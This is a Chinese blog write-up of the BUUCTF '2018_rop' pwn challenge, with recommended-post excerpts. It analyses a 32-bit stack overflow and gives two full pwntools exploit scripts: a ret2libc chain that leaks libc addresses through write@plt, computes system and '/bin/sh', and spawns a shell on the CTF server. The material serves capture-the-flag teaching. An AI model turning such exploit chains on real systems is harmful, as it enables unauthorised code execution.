[PWN] BUUCTF 铁人三项(第五赛区)_2018_rop 1(ret2libc3)

最新推荐文章于 2024-01-08 12:52:27 发布
最新推荐文章于 2024-01-08 12:52:27 发布
阅读量1.1k 收藏 8
点赞数 3
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45743302/article/details/117574749
版权

[PWN] BUUCTF 铁人三项(第五赛区)2018_rop_1

解题分析

按照惯例先checksec 一下,发现开了NX和RELRO
在这里插入图片描述
紧接着运行程序,了解运行逻辑,发现先让我们进行输入,然后再打印出"Hello,World"
在这里插入图片描述
用32位IDA打开,查看主要函数main和vulnerable_function,在main中除了write打印除"Hello,world"并没有发现别的。
在这里插入图片描述
而在vulnerable_function却发现buf只有0x88字节大小,但read却可以往buf中输入0x100字节,使所以存在栈溢出
在这里插入图片描述
shift+12后,发现没有可以直接利用的后门函数,则可发现是一个常规的32位libc泄露,首先利用write或read来泄露程序的libc版本,之后知道libc版本后,计算system函数以及binsh参数的地址,最后覆盖返回地址为system(‘/bin/sh’)来取得flag(从libc得到的是偏移地址,自己泄露的是函数的真正地址,所有函数的基址一致)

函数的真正地址 = 基地址 + 偏移地址
base_addr = read_addr - read_offset
sys_addr = system_offset + base_addr
bin_addr = binsh_offset + base_addr

在这里插入图片描述

payload分析

elf=ELF("./2018_rop")

调用2018_rop的elf文件,为下面找到main的地址,write的plt地址,write,read的got地址做准备

vul_addr=elf.sym['main']
write_plt=elf.plt['write']
write_got=elf.got['write']
read_got=elf.got['read']

通过elf找到印write函数的plt表和got表的地址,以及main函数的地址
至于为什么要找到write的plt和got表地址,那么就要去了解Linux延迟绑定机制,plt存放的是进入这个函数的地址,而got表中存放的是这个函数的真正地址

payload = 'a'*(0x88+0x4)
payload += p32(write_plt)         #调用write函数把got表中的函数真实地址打印出来保存
payload += p32(vul_addr)          #返回地址,调用完write返回主要利用函数
payload += p32(1)                 #设置write的参数,保持可写
payload += p32(write_got)         #打印got中地址
payload += p32(4)                 #打印的字节数

使用LibcSearcher来进行泄露libc,通过泄露的write地址来找到libc版本遗憾的是我的LibcSearcher中的Libc库没有这个题目的Libc所以找不到flag

payload1

#coding=utf-8
from pwn import *    #导入pwntools中的pwn包的所有内容
from LibcSearcher import*
context.terminal = ['terminator','-x','sh','-c']
p=remote("node3.buuoj.cn",28424)  #链接服务器远程交互,等同于nc、ip端口命令
elf=ELF("./2018_rop")
# libc = elf.libc

vul_addr=elf.sym['main']
write_plt=elf.plt['write']
write_got=elf.got['write']
read_got=elf.got['read']

payload = 'a'*(0x88+0x4)
payload += p32(write_plt)         #调用write函数把got表中的函数真实地址打印出来保存
payload += p32(vul_addr)          #返回地址,调用完write返回主要利用函数
payload += p32(1)                 #设置write的参数,保持可写
payload += p32(write_got)         #打印got中地址
# payload += p32(read_got)
payload += p32(4)                 #打印的字节数

p.sendline(payload)
write_addr=u32(p.recv())
log.success('write==>'+hex(write_addr))



libc = LibcSearcher('write', write_addr)
libc_base=write_addr-libc.dump('write') 
sys_addr=libc_base+libc.dump('system')
bin_addr=libc_base+libc.dump("str_bin_sh")

payload1 = "a" * 0x88
payload1 += "b"*4
payload1 += p32(sys_addr)+p32(1)+p32(bin_addr)
p.sendline(payload1)
p.interactive()

在这里插入图片描述
那么只能通过利用泄露出来的write或read后三位地址用https://libc.blukat.me/来查询libc版本以此来获取函数的偏移量,为了排除多余的libc,我这里泄露了write和read的地址来寻找正确的libc版本,从而得到偏移量
在这里插入图片描述

read_offset=0x0e5620
system_offset =0x03cd10
binsh_offset = 0x17b8cf

payload2

#coding=utf-8
from pwn import *    #导入pwntools中的pwn包的所有内容
from LibcSearcher import*
context.terminal = ['terminator','-x','sh','-c']
p=remote("node3.buuoj.cn",28424)  #链接服务器远程交互,等同于nc、ip端口命令
elf=ELF("./2018_rop")
# libc = elf.libc

vul_addr=elf.sym['main']
write_plt=elf.plt['write']
write_got=elf.got['write']
read_got=elf.got['read']

payload = 'a'*(0x88+0x4)
payload += p32(write_plt)         #调用write函数把got表中的函数真实地址打印出来保存
payload += p32(vul_addr)          #返回地址,调用完write返回主要利用函数
payload += p32(1)                 #设置write的参数,保持可写
# payload += p32(write_got)         #打印got中地址
payload += p32(read_got)
payload += p32(4)                 #打印的字节数

p.sendline(payload)
read_addr=u32(p.recv())
log.success('read==>'+hex(read_addr))

read_offset=0x0e5620
system_offset =0x03cd10
binsh_offset = 0x17b8cf

base_addr = read_addr - read_offset
sys_addr = system_offset + base_addr
bin_addr = binsh_offset + base_addr




payload1 = "a" * 0x88
payload1 += "b"*4
payload1 += p32(sys_addr)+p32(1)+p32(bin_addr)
p.sendline(payload1)
p.interactive()

在这里插入图片描述Get!

参考

https://blog.csdn.net/qq_51032807/article/details/114808339?spm=1001.2014.3001.5501

白沙染赤
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
BUUCTF ciscn_2019_c_1(ret2libc
weixin_45441024的博客
01-04 417
BUUCTF ciscn_2019_c_1(ret2libc) 首先还是check一下,之后放到IDA里面进行分析 可以看到里面有一个encrypt函数,我们来对他进行一个分析,可以看到一个关键点 做法一: 我们可以得出只要输入东西了,这个IF判断就是成立的,所以我们这里需要了解一个知识:在输入的内容前面加入’\0’可以绕过strlen这个函数 在这个函数里我们也可以很快找到溢出的地方,gets函数,对于我们输入的内容长度没有限制,再看上面定义变量的时候,s距离栈底的长度为0x50,纵观函数内容我们
CTF-PWN-buuctf-ciscn_2019_c_1-ret2libc的典型使用
serfend's blog
04-15 2425
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1ENhfN3jAV0TAUKpEIeZ7zw?pwd=2n64 提取码:2n64 答案:flag{e8165d23-782e-47fd-9c16-0a002b1f08bd} 总体思路 发现加密位置,判断其溢出点 通过设置第一个字符为\0以让strlen返回0,从而避免payload被破坏 构造执行,溢出获取puts的地址,从而得到libc版本 再次溢出,执行获取sh
BUUCTF--铁人三项(第五赛区)_2018_rop1
最新发布
qq_30528603的博客
01-08 553
我这是打本地的代码,远程的话给了libclibc,没给libcLibcSearcher,个人感觉不太好用,很多时候找不到。漏洞点主要在vulnerable_function()函数中。1.第一次布局通过题目中的write,puts等函数将库函数地址泄露,并能返回到主程序。2.通过计算算出libc基地址进一步得到system地址。这题是一题标准的rop。3.找到libc中bin/sh的位置。4.第二次布局就是直接布置rop
BUUCTFPWN铁人三项(第五赛区)_2018_rop
m0_55368674的博客
01-15 352
BUUCTFPWN铁人三项(第五赛区)_2018_rop题解
[BUUCTF]PWN——铁人三项(第五赛区)_2018_rop
BangSen1的博客
03-22 234
铁人三项(第五赛区)_2018_rop 32位,开启NX保护 运行程序。 用IDA打开,跳转到main函数 没有什么有用的信息,vulnerable_function()函数是输入点。 利用write函数来泄露程序的libc版本 知道libc版本后再计算程序里的system函数和字符串“/bin/sh”的地址 最后再覆盖返回地址 from pwn import * from LibcSearcher import * r=remote('node3.buuoj.cn',27850) elf=ELF
铁人三项(第五赛区)2018 rop
pondzhang的专栏
05-09 512
from pwn import * p = process('./2018_rop') gotwrite = 0x0804A010 pltwrite = 0x080483A0 start = 0x080483C0 bss = 0x0804A020 pltread = 0x08048360 def leak(address): payload = 'a' * 140 + p32(pltwrite) + p32(start) + p32(0x01) + p32(address) + p32(0x04
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 434
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 630
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
buuctf|pwn-铁人三项(第五赛区)_2018_rop-wp
l2645470582_的博客
11-09 717
1.检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串,没有发现关键字符串 3.我们查看main函数里面的内容 我们发现有两个函数 进入第一个函数 进入第二个函数 在第二个函数里面发现buf溢出,buf有0x88个字节,但是read()函数读取了0x100个字节 4.system("/bin/sh") 我们在文件中没有找到可以拿到shellcode权限 所以我们要用libc,计算偏移量,拿到shellcode权限...
BUUCTF(pwn)铁人三项(第五赛区)_2018_rop
半岛铁盒的博客
03-30 360
最基本的 rop; from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25292) elf=ELF('./2') write_got=elf.got['write'] write_plt=elf.plt['write'] main=0x80484c6 payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl
铁人三项(第五赛区)_2018_rop
、moddemod
06-20 625
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './2018_rop' p = process(proc_name) p = remote('node3.buuoj.cn', 25414) elf = ELF(proc_name) write_plt = elf.plt['write'] read_.
buuctf 铁人三项(第五赛区)_2018_rop
carol2358的博客
04-26 386
常规的32位泄漏libc,比较蛋痛的是我常规的写法不知道为什么出错,以后要多注意recv到的东西 exp: from pwn import * from LibcSearcher import * local_file = './2018_rop' local_libc = './libc.so.6' remote_libc = './libc.so.6' select = 1 ...
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop
Y_peak的博客
02-11 457
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop 题目地址: https://buuoj.cn/challenges#铁人三项(第五赛区)_2018_rop 思路:没有sytem函数,所以应该需要自己去找. 从旁边的函数列表发现了write函数,可以利用将 read 函数的 got所储存的内容泄露出来,泄露出read函数的实际地址 。利用循环调用,再次调用read函数, 然后利用偏移找到system函数和 '/bin/sh'字符串的位置。最后组成payload exploit
[PWN]铁人三项(第五赛区)_2018_rop
LDX的博客
11-27 243
[PWN] BUUCTF 铁人三项(第五赛区)_2018_rop
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 163
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值